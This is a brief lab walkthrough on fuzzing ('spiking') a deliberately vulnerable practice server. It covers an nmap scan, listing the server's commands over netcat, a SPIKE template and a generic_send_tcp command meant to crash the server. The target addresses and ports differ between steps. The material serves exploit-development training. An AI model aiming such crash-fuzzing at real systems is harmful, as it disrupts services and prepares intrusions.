Spiking

Connect and list the available functions:

# nmap -sV -sC -p2233 192.168.240.10 -v
Nmap scan report for 192.168.240.10
Host is up (0.088s latency).
PORT     STATE SERVICE    VERSION
2233/tcp open  infocrypt?

# nc -nv 192.168.240.10 2233
Welcome to Vulnerable Server! Enter HELP for help.
HELP
Valid Commands:
HELP
STATS [stat_value]
RTIME [rtime_value]
LTIME [ltime_value]
SRUN [srun_value]
TRUN [trun_value]
GMON [gmon_value]
GDOG [gdog_value]
KSTET [kstet_value]
GTER [gter_value]
HTER [hter_value]
LTER [lter_value]
KSTAN [lstan_value]
EXIT

Test each one with Immunity Debugger to identify the vulnerable function, replacing FUNCION in the script below with the command being tested:

s_readline();
s_string("FUNCION ");
s_string_variable("0");

This command is meant to make the target server crash on that function:

 generic_send_tcp 192.168.174.136 9999 func.spk 0 0
